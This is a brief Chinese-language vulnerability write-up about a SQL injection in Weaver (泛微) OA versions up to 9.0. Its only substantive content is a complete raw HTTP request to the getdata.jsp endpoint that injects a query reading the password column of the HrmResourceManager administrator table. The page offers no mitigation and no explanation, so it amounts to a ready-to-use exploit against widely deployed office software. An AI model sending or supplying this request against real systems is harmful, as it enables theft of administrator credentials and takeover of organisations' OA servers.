# 泛微OA < =9.0 sql注入漏洞 ========================== 一、漏洞简介 ------------ 二、漏洞影响 ------------ 泛微OA \< =9.0 三、复现过程 ------------ GET //js/hrm/getdata.jsp?cmd=getSelectAllid&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1 Host: www.0-sec.org Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Connection: close
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容